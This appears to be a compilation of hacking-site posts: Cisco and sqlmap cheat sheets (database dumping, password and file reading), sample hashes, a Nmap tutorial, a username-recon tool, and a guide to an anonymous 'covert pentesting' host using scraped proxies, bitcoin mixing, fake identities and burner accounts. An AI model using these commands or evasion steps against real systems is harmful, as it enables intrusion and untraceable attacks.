display open sessions.
# show session

Show network interfaces.
# show ip interface

Show detailed interface info.
# show interface e0

Show routes.
# show ip route

Show access-lists.
# show access-lists

Show available files.
# dir file systems

File information.
# dir all-filesystems

SHow deleted files.
# dir /all

No limit on terminal output.
# terminal length 0

Copies running config to tftp server.
# copy running-config tftp

Copy startup-config to running-config.
# copy running-config startup-config

Cryptography:
Hash Lengths:
HASH SIZE
MD5 Hash Length 16 Bytes

SHA-1 Hash Length 20 Bytes

SHA-256 Hash Length 32 Bytes

SHA-512 Hash Length 64 Bytes

Hash Examples:
Likely just use hash-identifier for this but here are some example hashes:

HASH EXAMPLE
MD5 Hash Example 8743b52063cd84097a65d1633f5c74f5

MD5 $PASS:$SALT Example 01dfae6e5d4d90d9892622325959afbe:7050461

MD5 $SALT:$PASS f0fda58630310a6dd91a7d8f0a4ceda2:4225637426

SHA1 Hash Example b89eaac7e61417341b710b727768294d0e6a277b

SHA1 $PASS:$SALT 2fc5a684737ce1bf7b3b239df432416e0dd07357:2014

SHA1 $SALT:$PASS cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024

SHA-256 127e6fbfe24a750e72930c220a8e138275656b
8e5d8f48a98c3c92df2caba935

SHA-256 $PASS:$SALT c73d08de890479518ed60cf670d17faa26a4a7
1f995c1dcc978165399401a6c4

SHA-256 $SALT:$PASS eb368a2dfd38b405f014118c7d9747fcc97f4
f0ee75c05963cd9da6ee65ef498:560407001617

SHA-512 82a9dda829eb7f8ffe9fbe49e45d47d2dad9
664fbb7adf72492e3c81ebd3e29134d9bc
12212bf83c6840f10e8246b9db54a4
859b7ccd0123d86e5872c1e5082f

SHA-512 $PASS:$SALT e5c3ede3e49fb86592fb03f471c35ba13e8
d89b8ab65142c9a8fdafb635fa2223c24e5
558fd9313e8995019dcbec1fb58414
6b7bb12685c7765fc8c0d51379fd

SHA-512 $SALT:$PASS 976b451818634a1e2acba682da3fd6ef
a72adf8a7a08d7939550c244b237c72c7d4236754
4e826c0c83fe5c02f97c0373b6b1
386cc794bf0d21d2df01bb9c08a

NTLM Hash Example b4b9b02e6f09a9bd760f388b67351e2b

SQLMap Examples:
A mini SQLMap cheat sheet:

COMMAND DESCRIPTION:
Automated sqlmap scan.
sqlmap -u http://meh.com –forms –batch –crawl=10 –cookie=jsessionid=54321 –level=5 –risk=3

Targeted sqlmap scan.
sqlmap -u TARGET -p PARAM –data=POSTDATA –cookie=COOKIE –level=3 –current-user –current-db –passwords –file-read=”/var/www/blah.php”

Scan url for union + error based injection with mysql backend and use a random user agent + database dump.
sqlmap -u “http://meh.com/meh.php?id=1” –dbms=mysql –tech=U –random-agent –dump

sqlmap check form for injection.
sqlmap -o -u “http://meh.com/form/” –forms

sqlmap dump and crack hashes for table users on database-name.
sqlmap -o -u “http://meh/vuln-form” –forms -D database-name -T users –dump

Nmap Basic's part one Simple scan

Welcome back to hacking arise lads Laughing Man here with a very basic understanding of some the commands in Nmap Free Security Scanner

What is Nmap network scanner

Nmap is a free and open-source network scanner created by Gordon Lyon. Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Nmap provides a number of features for probing computer networks, including host discovery and service and operating system detection Find out more

How To use Nmap

First let me start by saying i have Nmap install on my system but for people using termux type pkg install nmap this will install it on your termux as many os systems have it installed like Kali,parrot,cyborg hawk,black arch arch strike etc …

So see nmap full commands type Nmap in terminal or man nmap this gave you the manual for nmap in the terminal

note

some times when scanning you will be blocked this dont mean it dont work means the target not responding to the pings so if this happens use -Pn (eg nmap -Pn google.com and for IP’s nmap -Pn 127.0.0.1 )

simple scan

so this a simple command for a simple scan for ips or a website its easy just type nmap 127.0.0.1
well you wont be using the local host so if its a website put the url or if its a ip type it.

Post scanning

Right now lets move on to ways to find the ports we need so lets start by looking for a specific port this be port 80 so in terminal type nmap -p 80 127.0.0.1

so scanning one port is easy so lets scan two ports at one time so type nmap -p 80,433 127.0.0.1

now what we want to get all the ports on a ip or server we use this command nmap -p 1-9999 127.0.0.1

Ip Range

Now we move on two ip range scanning this help you nmap a network and see what devices are on it the two main commands for that are
nmap 127.0.0.1/28

or we can use this one nmap 127.0.0.1/14

what id we want to see everyone on the network we use the nmap 127.0.0.* this gave you everyone on the network 1 to 256

now lets take out a few ips to be excluded from the scan type nmap 127.0.0.* --exclude 127.0.0.1,127.0.0.2

top 20 ports

you way ask your self whats the top 20 ports well there

21/tcp closed ftp
22/tcp closed ssh
23/tcp closed telnet
25/tcp closed smtp
53/tcp closed domain
80/tcp closed http
110/tcp closed pop3
111/tcp closed rpcbind
135/tcp closed msrpc
139/tcp closed netbios-ssn
143/tcp closed imap
443/tcp closed https
445/tcp closed microsoft-ds
993/tcp closed imaps
995/tcp closed pop3s
1723/tcp closed pptp
3306/tcp closed mysql
3389/tcp closed ms-wbt-server
5900/tcp closed vnc
8080/tcp closed http-proxy

using this command nmap --top-ports 20 127.0.0.1
this will gave you that list and tell ya what ones is open .

Right lads we leave it at that and im going for a coffee and enjoying rest me fathers day lol whoop whoop

ALL THE BEST lAUGHINGMAN

pentestinfra a new way to stay anon online

Welcome to hacking a rise today is a real treat as are very own Shiva mead pentestinfa that way to anon ur network with out tor or vpn this tool is going to gave 4nonmizer a run for its money to find out more check Shivas blog CLICK HERE

Introduction
This is the first part of a series on how to build a covert pentesting infrastructure. Part 1 will focus on setting up the attacker’s localhost, that will then be able to connect to the attack VPS cloud server covertly using a mix of socks5 -, DNS -proxies and VPN. The knowledge in these articles comes in handy for red teaming or engagements that require anonymity. As a reader you will learn a state of the art modern method to build a pentesting infrastructure. The article series is as suchs:

Part 1: Attacker Localhost Setup (This article)
Part 2: Work VPS /Cloud Installation and Setup
Part 3: Custom Attack / Explotation Software
See the below illustration to get an overview of this project. Part 1 covers “Hacker Host”, Proxies and VPN.

The last chapter “Surf” includes a large reference of links, should the reader be interested.

Attacker Localhost Setup
The attacker’s localhost is the machine that must never be compromised or traced as it will reveal the identity of the operating agent. One could argue that part 1 is therefore the most important of the 3 parts.

Check List
A short primer checklist before the actual deepdive into tech anonymity:

Change MAC address of network cards using “macchanger”
Close all apps and background services connected to the web (use netstat)
All tracking in browser and OS are turned off and blocked (hardened)³³⁻³⁶
Bitcoins are properly mixed and using a third-party wallet
Connect to (multiple) scraped anon socks5 proxy and secured DNS proxy
Connect to a logless VPN that was obtained covertly
Connect to the internet through Tor or other browser that does not allow fingerprinting
DNS settings are configured to use a logless DNS
Logged out of all online accounts
Emails are sent using burner accounts
New accounts registered and logged in with burner emails
Search with DuckDuckGo or StartPage
Use foreign hardware, if at all possible. Preferably other than your neighbours WiFi.*
*Note that WiFi hotspots in e.g. cafés often user more tracking than the average 4G data connection.

Scraping Proxies
In order to setup a proxy server (see Redsocks chapter) with random proxies first some proxies must be fetched. This is done by using the tool “fetch-some-proxies”¹. Simply run ./fetch.sh to fetch proxies which will execute the following commands:

sudo python fetch-some-proxies/fetch.py | tee proxyscrape.tmp
sudo grep -e “elite” proxyscrape.tmp > proxyscrape2.tmp
sudo grep -e “socks5” proxyscrape2.tmp > proxyscrape.lst
rm proxyscrape*.tmp
cat proxyscrape.lst
Only socks5 proxies of the elite type is of interest as several protocols must be routed to the proxy and with as high an anonymity as possible.

As unwanted proxies are now filtered away, a proxy with short latency is chosen from “proxyscrape.lst”, e.g. socks5://178.62.59.71:4076 . Now that the proxy list is populated, the next chapter will show how to use a scraped proxy with redsocks.

Redsocks Install & Setup
“Redsocks is the tool that allows you to proxify (redirect) network traffic through a SOCKS4, SOCKS5 or HTTPs proxy server. It works on the lowest level, the kernel level (iptables). The other possible way is to use application level proxy, when the proxy client is implemented in the same language as an application is written in. Redsocks operates on the lowest system level, that’s why all running applications don’t even have an idea that network traffic is sent through a proxy server, as a result it is called a transparent proxy redirector.” ¹⁴

sudo apt-get install redsocks
sudo nano /etc/redsocks.conf
Then insert redsocks.conf file included (see below) and continue:

sudo redsocks -c /etc/redsocks.conf
redsocks.conf :

base {
log_debug = on;
log_info = on;
log = “stderr”;
daemon = off;
redirector = iptables;
}

redsocks {
local_ip = 127.0.0.1;
local_port = 12345;

// socks5://178.62.59.71:4076
ip = 178.62.59.71;
port = 4076;
type = socks5;
// known types: socks4, socks5, http-connect, http-relay

// login = username;
// password = password;
}

dnstc {
// fake and really dumb DNS server that returns “truncated answer” to
// every query via UDP, RFC-compliant resolver should repeat same query
// via TCP in this case.
local_ip = 127.0.0.1;
local_port = 5300;
}

// you can add more `redsocks’ and `redudp’ sections if you need.

This concludes the installation and setup of redsocks. However, to route all traffic trough redsocks and the scraped proxy iptables are required. For installing iptables and setting up with redsocks refer to “debian manpages”¹⁶ and stackexchange¹⁵. In any case, using the script included with this project both redsocks and iptables can be started using “./startREDsocks.sh”:

#!/usr/bin/env bash
sudo ./restartDNScrypt.sh
sudo ./iproute.sh
echo “Starting redsocks…”
sudo redsocks -c /etc/redsocks.conf
sudo ./resetiproute.sh
sudo ./myip.sh
While DNScrypt and secure DNS in general will be covered in the next chapter “Secure DNS”, ./iproute.sh routes traffic through redsocks proxy with iptables and “./resetiproute.sh” stops the routing through redsocks. A closer look:

#!/usr/bin/env bash
echo “Routing selected ports trough redsocks proxy”
echo ” ”

sudo iptables -t nat -N REDSOCKS
sudo iptables -t nat -A REDSOCKS -d 0.0.0.0/8 -j RETURN
sudo iptables -t nat -A REDSOCKS -d 10.0.0.0/8 -j RETURN
sudo iptables -t nat -A REDSOCKS -d 127.0.0.0/8 -j RETURN
sudo iptables -t nat -A REDSOCKS -d 169.254.0.0/16 -j RETURN
sudo iptables -t nat -A REDSOCKS -d 172.16.0.0/12 -j RETURN
sudo iptables -t nat -A REDSOCKS -d 192.168.0.0/16 -j RETURN
sudo iptables -t nat -A REDSOCKS -d 224.0.0.0/4 -j RETURN
sudo iptables -t nat -A REDSOCKS -d 240.0.0.0/4 -j RETURN

sudo iptables -t nat -A REDSOCKS -p tcp -j REDIRECT –to-ports 12345

sudo iptables -t nat -A OUTPUT -p tcp –dport 443 -j REDSOCKS
sudo iptables -t nat -A OUTPUT -p tcp –dport 80 -j REDSOCKS
sudo iptables -t nat -A OUTPUT -p tcp –dport 22 -j REDSOCKS
sudo iptables -t nat -A OUTPUT -p tcp –dport 21 -j REDSOCKS

sudo iptables -t nat -A PREROUTING -p tcp –dport 443 -j REDSOCKS
sudo iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDSOCKS
sudo iptables -t nat -A PREROUTING -p tcp –dport 21 -j REDSOCKS
sudo iptables -t nat -A PREROUTING -p tcp –dport 22 -j REDSOCKS
Note that depending on what ports should be forwarded it might be necessary add or change dport lines. As for “resetiproute.sh” it works like so:

#!/usr/bin/env bash
echo “Resetting IPtables i.e. stop routing trough redsocks proxy”
echo ” ”
sudo iptables -F
sudo iptables -X
sudo iptables -Z
sudo iptables -t nat -F
sudo iptables -t nat -X
sudo iptables -t nat -Z
killall redsocks
For more information on iptables please refer to “How to force all Linux apps to use SOCKS proxy” ¹².

Redsocks with Multiple Proxies
Adding additional proxies to redsocks doesnt necessarily lead to higher anonymity or security, as the proxies are not chained and still DNS leak, but will help balacing the load. As before “/etc/redsocks.conf” file must be edited, this time with additional chapters, like so:

**More proxies**
redsocks {
local_ip = 127.0.0.1; ip = 127.0.0.1; type = socks5;
local_port = 11080;
port = 1080;
}
redsocks {
local_ip = 127.0.0.1; ip = 127.0.0.1; type = socks5;
local_port = 11081;
port = 1081;
}
redsocks {
local_ip = 127.0.0.1; ip = 127.0.0.1; type = socks5;
local_port = 11082;
port = 1082;
}
Furthermore, “iproute.sh” needs to be updated accordingly:

iptables … -m random –mode random –probability 0.3333333333 -j REDIRECT –to-ports 11080
iptables … -m random –mode random –probability 0.3333333333 -j REDIRECT –to-ports 11081
iptables … -j REDIRECT –to-ports 11082
Now enjoy seemless proxy rotation.

The purpose of this project is to be covert and despite the use of socks5 proxy there is still DNS leak, although IP is now spoofed. To test different scenarios “dnsleaktest.com” ⁹ is utilized and although origin IP is spoofed, showing IP of the proxy, a “dnsleaktest.com” extended test still shows original IP. To avoid this, DNS must be covert, and so this is covered in the next chapter “Secure DNS”.

Secure DNS
Proxies and IP-spoofing is pointless without a secure DNS as DNS leak will reveal the origin IP. (Good) VPNs setup their own DNS and could VPNs be trusted, scraped proxy and secure DNS would not be required. As this is not the case read on.

DNS over Proxy
There are several services that deliver DNS over proxy. For more information on DNS via proxy please refer to the surf section “Anon DNS Servers” ²⁴ ²⁵. Setting up a DNS proxy is quite straightforward, in the following example https://dns.watch ²⁴ DNS servers are applied. First update the resolver configuration:

sudo nano /etc/resolvconf/resolv.conf.d/base
nameserver 84.200.69.80
nameserver 84.200.70.40
sudo resolvconf -u
Then set DNS for both IPv4 and IPv6 using the NetworkManager²³ (use 84.200.69.80 and not 8.8.8.8):

Search ‘ Network Connection’
Open it

Then select either WiFi or Ethernet, or whatever you are using, and click on edit. You’ll get this:

https://github.com/CPH-SEC/CPH-SEC.github.io/blob/master/pics/networkcon2.png

Select ipv4 in tabs
Select addresses only in method
Enter your DNS name below, and save it (dont use 8.8.8.8, its Google transparent DNS, but e.g. 84.200.69.80)
Repeat 4-6 for IPv6 also for all interfaces
Restart NetworkManager “sudo service network-manager restart”
Go test on dnsleaktest.com
Testing with “dnsleaktest.com” result will now be as intended:

https://github.com/CPH-SEC/CPH-SEC.github.io/blob/master/pics/dnsleakfixed.png

Next chapter shows how to use DNSCrypt to add an extra level of DNS anonymity.

DNSCrypt-Proxy Install & Setup
Although DNS leak was fixed by the configuration in the last chapter, some might still want to implemented DNSCrypt as an additional level of protection, although its not strictly needed. First install DNSCrypt proxy like so:

sudo apt purge dnscrypt-proxy
sudo apt update
sudo apt install dnscrypt-proxy
sudo systemctl restart NetworkManager
sudo systemctl restart dnscrypt-proxy
sudo apt install resolvconf
sudo nano /etc/NetworkManager/NetworkManager.conf
Then edit “NetworkManager.conf” to look like this:

[main]
dns=default

plugins=ifupdown,keyfile

[ifupdown]
managed=false

[device]
WiFi.scan-rand-mac-address=no
And finally run “./restartDNScrypt.sh”, which does the following:

sudo systemctl stop systemd-resolved
sudo systemctl disable systemd-resolved
sudo systemctl restart network-manager
sudo systemctl restart dnscrypt-proxy
In the next chapter another level of anonymity is presented as the use of VPN is discussed.

Virtual Private Network
In the earlier chapters it was shown how to spoof both IP address and avoid DNS leak. However, so far the traffic has not been encrypted and could be wiretapped, although our SSH connection in part 2 to the VPS will be encrypted. By using a VPN, wiretapping is avoided and so it is important to use a good VPN to make sure the encryption is strong enough. Furthermore, the effectiveness of a VPN is different compared to if the VPN is used before or after proxy servers. What is even more important is to obtain the VPN service covertly as the us of a credit card VPN, that also keep logs(!), defeats most of efforts to be anonymous and acting covertly on the net. Some points that need to be considered choosing a VPN:

Can be obtained covertly e.g. with cryptocurrency payment
Logless
Strong encryption
Big Keys
No leak, DNS, IP, WebRTC or other
ExpressVPN and NordVPN, and others, are believed to be such VPNs.

PROXY and VPN vs VPN and PROXY

While it could seem trivial whether to use proxy in front of the VPN or vice versa it is in fact crucial in a world were VPNs cant be trusted. In this article a proxy is used in front of the VPN (seen from the hosts side) meaning “not exisiting” VPN logs will not show the IP of client origin. This only works if the VPN is obtained covertly, as discussed in the laster chapter. One way to obtain VPN covertly is covered in the next chapter.

Bitcoin Mixing / Tumbling / Washing
There are several ways to obtain VPN and VPS covertly but if no other method is available, buying a service with bitcoin is a possibility, when done correctly! As this is not an article about bitcoins please refer to the internet for background information regarding bitcoin and/or cryptocurrency. Here, the interest is in obtaining and using bitcoin anonymously and for a full guide please refer to the surf section³⁸. Note also that some cryptocurrencies are believed to be more anonymous than bitcoin, while not as extensively used among vendors. Shortly, to mix/tumble/wash bitcoins a service suchs a ‘Bitblender’ or ‘Bitmixer’ is required. The process is a such³⁸:

Choose a bitcoin mixing service e.g. ‘Bitblender’ or ‘Bitmixer’
Use Tor- Onion Router to stay anonymous
Use Logless VPN (NordVPN is believed to be such a VPN)
Aquire New Address for Transactions
Buy/Sell Bitcoins in Cash using fake identiy using tools such as
LocalBitcoins.com
Fake Name Generator
Guerilla Mail
Burner phone or service
For extra safety try JoinMarket and trade
Following this procedure flawlessly its possible to buy services such as VPN or VPS anonymously using bitcoin. Using bitcoin is only recommendable if other more covert methods are not available since blockchain leaves a “paper trail” that could possibly, in the future could be traced using so far unknown computing power and algorithms. This is somewhat “tinfoil hat” speculation of course. Regardless how the VPN is obtained it must be tested and this is the topic of the next chapter.

Testing VPNs
Sadly, a large percentage of VPNs are useless and not as secure as advertised. In general there are 4 well known ways VPN can leak origin host information:

IP Leak
DNS Leak
WebRTC Leak
MSLeak Test*
*MSLeak is only relevant for users of Microsoft Windows, which is not recommendable to use for anonymity.

In this article 3 tools are used to test anonymity:

https://ipleak.net/
https://www.privacytools.io/
https://www.perfect-privacy.com
Testing a covertly obtained VPN gives results as below:

Result shows VPN location, so test passed.

https://github.com/CPH-SEC/CPH-SEC.github.io/raw/master/pics/pp_vpn_webrtc.png

No WebRTC leak, so test passed.

No DNS leak, so test passed. Note that the DNS Leak test will show proxy or VPN IP depending on which is placed in front (last).

Conclusion
In this article it was described how to secure the origin host/client, used by the operating agent in a covert pentesting assignment. Each step must be executed perfectly but the included scripts makes it possible.

This was part 1 of a 3 part series, part 2 will demonstrate how to setup the VPS server that will run the actual tests and attack scripts; while chapter 3 will demonstrate how a custom test / attack framework could look.

Surf (LMGTFY):
Tools
¹ Fetch-some-proxies: https://github.com/stamparm/fetch-some-proxies
² https://github.com/jorgenkg/python-proxy-rotator
³ https://github.com/allfro/pymiproxyhttps://www.thesaurus.com/browse/necessarily
⁴ https://github.com/constverum/ProxyBroker
Multiple TOR Proxies
⁵ http://blog.databigbang.com/running-your-own-anonymous-rotating-proxies/
⁶ http://www.haproxy.org/
⁷ http://blog.databigbang.com/distributed-scraping-with-multiple-tor-circuits/
⁸ http://www.delegate.org/delegate/
Test
⁹ DNS leak test: https://www.dnsleaktest.com
¹⁰ Whats my IP: https://www.whatsmyip.org/
¹¹ Browser fingerprinting test: https://panopticlick.eff.org/
Privacy Tools: https://www.privacytools.io/
https://ipleak.net/
Redsocks and IPtables
¹² How to force all Linux apps to use SOCKS proxy: https://superuser.com/questions/1401585/how-to-force-all-linux-apps-to-use-socks-proxy?rq=1
¹³ https://crosp.net/blog/administration/install-configure-redsocks-proxy-centos-linux/
¹⁴ https://unix.stackexchange.com/questions/71429/redirect-all-non-local-traffic-to-a-socks-proxy
¹⁵ https://manpages.debian.org/stretch/iptables/iptables-extensions.8.en.html#TPROXY
¹⁶ Escape proxy hell with Redsocks: https://jmkhael.io/escape-proxy-hell-with-redsocks/
Anon VPS
¹⁷ Anonymous SSD VPS: https://anonymously.io/anonymous-vps/
¹⁸ Cheap Anonymous VPS Providers: https://cheapvillage.com/cheap-anonymous-vps-providers/
¹⁹ Dreamhost with bitcoin: https://bitlaunch.io/
DNS Leak Avoidance
²⁰ https://www.smarthomebeginner.com/vpn-kill-switch-with-ufw/
²¹ https://support.rackspace.com/how-to/changing-dns-settings-on-linux/
²² https://unix.stackexchange.com/questions/128220/how-do-i-set-my-dns-when-resolv-conf-is-being-overwritten/163506#163506
²³ https://unix.stackexchange.com/questions/494324/how-to-setup-dns-manually-on-linux

Anon DNS servers
²⁴ Secure DNS root: https://dns.watch
²⁵ Secure DNS root: https://www.opennic.org/

RDP
²⁶ RDP Manual: https://5socks.net/Manual/rdp_eng.html
²⁷ RDP VPN Manual: https://5socks.net/Manual/what_is_rdp_vpn_eng.htm
SSH Routing
²⁸ https://linuxize.com/post/how-to-setup-ssh-socks-tunnel-for-private-browsing/
²⁹ https://www.dnsflex.com/how-to-route-all-network-traffic-from-your-lan-securely-through-a-socks5-proxy-ssh-tunnel-redsocks/
³⁰ https://hackertarget.com/ssh-examples-tunnels/
SSH Routing with a Service
³¹ Expose local servers to the internet: https://serveo.net/
³² Public URLs for exposing your local web server: https://ngrok.com/
Browser & OS Hardening
³³ Firefox privacy, security and anti-fingerprinting: https://github.com/ghacksuserjs/ghacks-user.js
³⁴ The Practical Linux Hardening Guide³⁸: https://github.com/trimstray/the-practical-linux-hardening-guide
³⁵ how-to-stay-anonymous: https://www.hackeroyale.com/how-to-stay-anonymous/
³⁶ user.js – Firefox configuration hardening : https://github.com/pyllyukko/user.js
VPN
³⁷ How To Stay Anonymous While Hacking: https://www.tech21century.com/expressvpn-vs-nordvpn-comparison/
Bitcoin

³⁸ Ways To Guarantee Anonymity When Making Bitcoin Transactions: https://coinsutra.com/anonymous-bitcoin-transactions/

Userrecon-Py - Find Usernames In Social Networks

 

Find usernames in social networks

Installation

1. Install dependencies(Debian/Ubuntu):

sudo apt install python3 python3-pip

2. Install with pip3:

sudo -H pip3 install git+https://github.com/decoxviii/userrecon-py.git userrecon-py –help

Building from Source
Clone this repository, and:

git clone https://github.com/decoxviii/userrecon-py.git ; cd userrecon-py sudo -H pip3 install -r requirements.txt python3 setup.py build sudo python3 setup.py install

Update
To update this tool to the latest version, run:

sudo -H pip3 install git+https://github.com/decoxviii/userrecon-py.git –upgrade userrecon-py –version

Usage
Start by printing the available actions by running userrecon-py --help. Then you can perform the following tests:

userrecon-py target chommie_smith -o test1